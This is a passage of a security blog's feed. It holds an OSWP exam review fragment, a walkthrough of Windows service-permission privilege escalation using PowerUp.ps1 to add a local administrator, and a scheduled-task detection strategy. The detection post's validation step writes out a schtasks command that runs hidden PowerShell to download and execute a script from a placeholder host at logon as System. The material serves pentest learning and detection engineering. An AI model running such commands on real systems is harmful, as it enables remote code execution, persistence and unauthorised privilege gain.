<p><img src="/assets/images/OSWP/pass.png" alt="exam.jpg" /></p>]]></content><author><name></name></author><category term="review" /><summary type="html"><![CDATA[As I begin to write this review, I just submitted my exam report listening to a few acoustic sessions while enjoing a libation. That being said, I came across this course after if was revised from the backtrack 5 days where every home network and attack vector was WEP and with the right amount of IVs, every network was crackable in minutes.]]></summary></entry><entry><title type="html">Abusing Service Permissions</title><link href="/technicalblog/2022/06/20/ServicePermissionAbuse.html" rel="alternate" type="text/html" title="Abusing Service Permissions" /><published>2022-06-20T16:44:14+00:00</published><updated>2022-06-20T16:44:14+00:00</updated><id>/technicalblog/2022/06/20/ServicePermissionAbuse</id><content type="html" xml:base="/technicalblog/2022/06/20/ServicePermissionAbuse.html"><![CDATA[<p>This blog will show a bit into the service permission abuse and how weak or insecure permissions can be leveraged to exploit something trivial.</p>

<p>I won’t show how I identified this as I don’t have the screenshot and would like to focus on the exploit.</p>

<h3 id="snmptrap-service">SNMPTRAP Service</h3>

<p>The follow screenshot demonstrates the service. You may note, it is disabled by default, and is running as a default configuration account when creating a service. There are MULTIPLE ways to exploit something like this, especially when you have the permissions to modify all configurations of the service.</p>

<p><img src="/assets/images/ServicePerm/scqc.png" alt="pastedimage.png" /></p>

<p>First thing I noticed is the service is disabled.. This cannot be started/stopped without being enabled first so we launch services (<code class="language-plaintext highlighter-rouge">Win+R and type services.msc</code>)</p>

<p>Identify the snmptrap service and open the properites.</p>

<p><img src="/assets/images/ServicePerm/servicesmsc.png" alt="pastedimage1.png" /></p>

<p><img src="/assets/images/ServicePerm/disable.png" alt="pastedimage2.png" /></p>

<p>Enable the service (you can also do this from cmdline but this service.msc is good to know as it can be helpful during pentests)</p>

<p><img src="/assets/images/ServicePerm/enable.png" alt="pastedimage3.png" /></p>

<p>As identified in the first image, the service is using localService, this won’t cut it (found this out by trial and error), we need to set this to the local system account in order to abuse this to the level in which we want to.</p>

<p><img src="/assets/images/ServicePerm/setaccount.png" alt="pastedimage4.png" /></p>

<p>Powerup.ps1 has a function module that can exploit the binPath to create a user and add a local administrator user (Not domain joined) which was exactly what I needed at the time.</p>

<p>https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</p>

<p>Import the module - <code class="language-plaintext highlighter-rouge">Import-Module PowerUp.ps1</code></p>

<p><img src="/assets/images/ServicePerm/invoke.png" alt="pastedimage5.png" /></p>

<p>The exploit worked, running a few net user commands on the local machine (not domain) shows that the john user was added succesfully.</p>

<p><img src="/assets/images/ServicePerm/proof.png" alt="pastedimage6.png" /></p>

<p>This is a trivial Priv Esc that might come in handy to me, you, or anyone in the world that finds a similar vuln</p>

<h3 id="references">References:</h3>

<p><a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config">https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config</a></p>

<p><a href="https://docs.microsoft.com/en-us/windows/win32/services/localservice-account">https://docs.microsoft.com/en-us/windows/win32/services/localservice-account</a></p>]]></content><author><name></name></author><category term="TechnicalBlog" /><summary type="html"><![CDATA[This blog will show a bit into the service permission abuse and how weak or insecure permissions can be leveraged to exploit something trivial.]]></summary></entry><entry><title type="html">Suspicious System Scheduled Task/Job ADS</title><link href="/review/2022/05/31/ScheduledTask-ADS.html" rel="alternate" type="text/html" title="Suspicious System Scheduled Task/Job ADS" /><published>2022-05-31T16:44:14+00:00</published><updated>2022-05-31T16:44:14+00:00</updated><id>/review/2022/05/31/ScheduledTask-ADS</id><content type="html" xml:base="/review/2022/05/31/ScheduledTask-ADS.html"><![CDATA[<h2 id="suspicious-system-scheduled-taskjob">Suspicious System Scheduled Task/Job</h2>
<hr />
<h3 id="goal">Goal</h3>
<p>Detect when Scheduled Tasks are created or modified to run at System Level Privileges. This may be indicative of an attempt for an attacker or malware to establish persistesence on a Windows machine.</p>

<hr />

<h3 id="categorization">Categorization</h3>
<p>These attemps are categorized as <a href="https://attack.mitre.org/techniques/T1053/">Execution / Scheduled Task/Job </a></p>

<hr />

<h3 id="strategy-abstract">Strategy Abstract</h3>
<p>The strategy will function as follows:</p>
<ul>
  <li>Monitor window event codes on Windows Systems.</li>
  <li>Define the command line arguments that need to be detected on.</li>
  <li>Supress any known &amp; non-malicious tasks (depending on client size, this approach can differ)</li>
  <li>Alert on any tasks that are created or modified at System Level Privileges.</li>
</ul>

<hr />

<h3 id="technical-context">Technical Context</h3>

<p>A Scheduled task is a command, program, or script to be executed at a particular time in the future on Windows machines. This can vary based on the conditions provided to execute when a user logs on or a regular interval. System Admin use these to create and run operational tasks much like cronjobs on Linux machines.</p>

<p>With that being said, these can be morphed to be used in a malicious manner. Advesaries use these already existing functionality on Windows systems to establish persistence whether that would be on start up or a Command and Control Server.</p>

<p>When configuring the scheduled tasks, the following event IDs are of interest for this ADS:</p>

<table>
  <thead>
    <tr>
      <th>Event Code</th>
      <th>Description</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>4698</td>
      <td>A scheduled task was created</td>
    </tr>
    <tr>
      <td>4699</td>
      <td>A scheduled task was deleted</td>
    </tr>
    <tr>
      <td>4700</td>
      <td>A scheduled task was enabled</td>
    </tr>
    <tr>
      <td>4701</td>
      <td>A scheduled task was disabled</td>
    </tr>
    <tr>
      <td>4702</td>
      <td>A scheduled task was updateds</td>
    </tr>
  </tbody>
</table>

<p>For this ADS, the event IDs that will be focused on will be 4698, 4700, and 4702. Sysmon also provides some event codes such as Event Code 1 that schtask.exe executes.</p>

<p>For this detection we will look for scheduled tasks created with System level privileges</p>

<hr />
<h3 id="blind-spots-and-assumtions">Blind Spots and Assumtions</h3>
<p>This strategy relies on the following assumptions:</p>
<ul>
  <li>The Machine is proper logging the proper Windows Event Log and sending to WEF Servers.</li>
  <li>WEF servers are correctly forwarding events to the SIEM.</li>
  <li>SIEM is successfully indexing group change events.</li>
</ul>

<p>A blind spot will occur if any of the assumptions are violated. For instance, the following would not trip the alert:</p>
<ul>
  <li>Windows event logging breaks.</li>
  <li>The SIEM UC job is running at all time.</li>
</ul>

<hr />

<h3 id="false-positives">False Positives</h3>
<p>With this being a built in functionality, the usage on this can vary depending on the size of the enviroment. There are serveral instances where false positives for this ADS could occur:</p>
<ul>
  <li>Legitimate tasks created by System Administrators.</li>
  <li>Drivers and OS support creation of scheduled tasks such as power savers on laptops.</li>
</ul>

<hr />

<h3 id="priority">Priority</h3>
<p>The priority is set to medium under all conditions.</p>

<hr />

<h3 id="validation">Validation</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>schtasks /create /tn test /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://x.x.x.x:8080/x'''))'" /sc onlogon /ru System
schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
</code></pre></div></div>

<hr />

<h3 id="response">Response</h3>
<p>In the event that this alert fires, the following response procedures are recommended:</p>
<ul>
  <li>Triage of the host system and if the activity is normal.
    <ul>
      <li>Note the account that created it, suspicious arguments, or abnormal timeframe.</li>
    </ul>
  </li>
  <li>Identify what the schedule task is performing
    <ul>
      <li>ex: Execution of binary, in memory powershell execution, connection to web server</li>
    </ul>
  </li>
  <li>Use endpoint EDR or tool to invesitage or isolate the host.</li>
</ul>

<hr />

<h3 id="additional-resources">Additional Resources</h3>
<p><a href="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md">https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md</a></p>]]></content><author><name></name></author><category term="review" /><summary type="html"><![CDATA[Suspicious System Scheduled Task/Job Goal Detect when Scheduled Tasks are created or modified to run at System Level Privileges. This may be indicative of an attempt for an attacker or malware to establish persistesence on a Windows machine.]]></summary></entry></feed>